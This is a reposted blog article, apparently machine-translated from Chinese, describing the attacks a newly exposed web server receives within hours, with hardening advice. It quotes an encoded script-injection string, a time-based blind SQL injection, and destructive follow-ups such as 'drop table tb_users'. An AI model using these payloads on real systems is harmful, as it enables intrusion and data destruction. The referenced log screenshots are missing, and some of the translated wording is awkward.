how long can a web server run naked on the internet?

Posted by fierce at 2020-02-27

From: Hengsheng R & D

Author: Tong Shihong

Link: (click the tail to read the original)

Reprint authorized

In many cases, we easily expose the web server to the public network, check the access log, and you can see that a large number of attack requests will be received. This is the request received several hours after the website is opened:

1. Probe server information

After one minute on-line, the option request is detected.

Now he knows that I use Apache, and the operating system is CentOS, so I can carry out targeted attacks.

Tips: how do you hide Apache information? There are books.

2. Command execution attack

Half an hour online, received a large number of exploits of web server command execution vulnerability.

If your server uses ASP or structs2 and has debugging mode enabled (most services are on first), Congratulations, your safe life time in the network is half an hour, and the server has been taken over.

3. Configuration vulnerability - crawling code

Many projects use SVN to manage code, and use ant or MVN to package (it seems that they are basically). If the package script is not configured correctly, the. SVN directory will enter the war package, which contains all your source code.

Someone will say, didn't I set robots.txt to tell him not to climb my code?

Alas, this is a gentleman's agreement. Baidu, Google and other search engines will politely leave as soon as they see the content and say don't climb my content.

Others may be interpreted as: material

You must turn off the default column directory permission, otherwise all your code has been copied within 4 hours after the website is opened.

4. Targeted vulnerability attack

Here, the enemy already knows that you are using Apache, and directly exploit the Apache vulnerability.

If you are using the Apache default installation and do not apply a security patch, your life is over. It is estimated that 80% of the people have fallen down and have lived for 8 hours. That's enough.

5、 Attack configuration vulnerability

Usually we have installation programs, database tools, etc. when we install, for example, many people who use MySQL will install phpMyAdmin, but after the installation, almost no one will delete the setup.php file.

Some security conscious developers will delete files after using key information, such as database installation scripts. But it will forget that there was a change at that time, and a. Bak file will be generated automatically.

Many times you haven't reported to the leader that the installation of the system is completed. The enemy has used the initial password in your database to use the system.

In addition, the leadership requires to strengthen the security awareness and strengthen the password, but the password is too many to remember. Find a file and save it.

What happened

There is also a scenario in which Java is used - the system is just online. To monitor, it is necessary to open jconsole or even web console (Tomcat is used in many cases, and the default console is available), so:

It's convenient for you and everyone.

6. Unsafe file storage

Administrators often back up the system for the sake of system security. Many systems are user-friendly and can be backed up online. Unfortunately, however, the files are stored in an accessible Directory:

If there are implementers who install the website without deleting the installation files, it will be more convenient.

In another scenario, the log is very important for finding problems, but the server is not directly accessible in many times. How troublesome it is to get the log, and how convenient it is to open a remote access. So the bad guys are also convenient.

7. Configuration vulnerability - insecure permission settings

This is the use of apach vulnerability to tamper with the file posture ah, my home directory is writable, has been added.

8. Operating system vulnerability - File Execution Vulnerability

Security conscious developers put files out of the web directory, which is much safer. But you have to access it, so you have to read the file in the code, so you need to find the file:

The code has been given out.

9. Configuration vulnerability - do not start service with administrator

Is it a hassle to build a user to start a web service? But it is necessary.

You may think this is not pediatrics. I found two points to clean up:

10. Script injection

Script injection you prevent, but do you prevent% 3cscript? Is there any further prevention against script? Or:% 3CS% 43ript% 3e

Why do you want a white list instead of a black list!

11. SQL injection

Look at the tables in your database.

12. The end of the back door

In order to facilitate management, it is necessary to leave a back door statistical information, and when appropriate, it can be remotely managed, which others do not know.

If you want to be unknown, you can't do it unless you are yourself.

13. Overflow attack and tripartite pipeline

The purpose of overflow attack is to create an overrun, which can cause the value outside the stack to be tampered with. This part of the research is not well understood. But this is more like a trial, and the following is more like an overflow:

After that, it's all. /. /, at least several K. It's estimated that it's trying until HTTP can accept the largest message.

The tripartite pipeline is very important, because in most cases, we will prevent other people's attacks, but rarely we will prevent internal transmission. The enemy doesn't want to live in the enemy's attack, but to steal out your valuable content. So it's one thing to come in and another thing to send out. Many servers have web access, which is the same as opening the door for the enemy's transportation.

For example, your system has SQL injection, but it is not union injection but SQL blind injection. So bad people can steal your database (drag database) through SQL injection. How can this file be sent back?

Of course, if your users have very high permissions, you can write this file to an external network accessible directory. But what if not? So we need to establish a three-party pipeline. The second line of the first figure in this section is to register my information on the other party's server. If the registration is successful, we can use this HTTP channel to transmit data next time, or even use port 80 to connect with the other party's Trojan control program. The following things are as convenient as your remote desktop.

So, remember to forbid the server to connect outside! It is very necessary to restrict the web server to access only background specific systems such as databases.

14. SQL blind annotation

What is SQL blind annotation? Blind injection is injection with eyes closed. For example, your order by clause has SQL splicing, and there is no way to retrieve data with union in this place. How can I judge whether the injection is successful or not?

If this instruction receives the order, it generates a SQL statement: select.. from.. order by if (now() = = sysdate(), sleep (9), 0)

Now must be sysdate. How stupid the enemy is!

You are right. Now is equal to sysdate. If the injection is successful, the request should not return until 9 seconds later, otherwise it will return immediately.

Another example is insert and update injection. They will not return data values, but:

If the injection is successful, it should be delayed for 3 seconds. Next time, you can play it here, for example, write a: shutdown; or: drop table tb_users


Now there are too many automatic tools. Xiaohei can easily infiltrate your website without knowing Shenma's professional technology. Some people on the Internet say that 80% of the machines are broilers. According to the attacks on this server when it is turned on, it's no exaggeration! If you don't have a systematic security system, it's not easy to live for 8 hours once you access the Internet.

From: Hengsheng R & D

Author: Tong Shihong

Link: (click the tail to read the original)

Reprint authorized

This article is numbered 1790. If you want to read this article in the future, just enter 1790.

● this article is classified as "hacker" and "web development", and relevant articles can be obtained by searching the classification name.

● enter m to get the article directory

Hacker technology and network security

Web development

For more recommendations, please refer to "15 technical public wechat"

Covering: program life, algorithm and data structure, hacker technology and network security, big data technology, front-end development, Java, python, web development, Android development, IOS development, C / C + +,. Net, Linux, database, operation and maintenance, etc. Disseminating computer learning experience and recommending excellent computer resources: click on "15 WeChat official account of concern".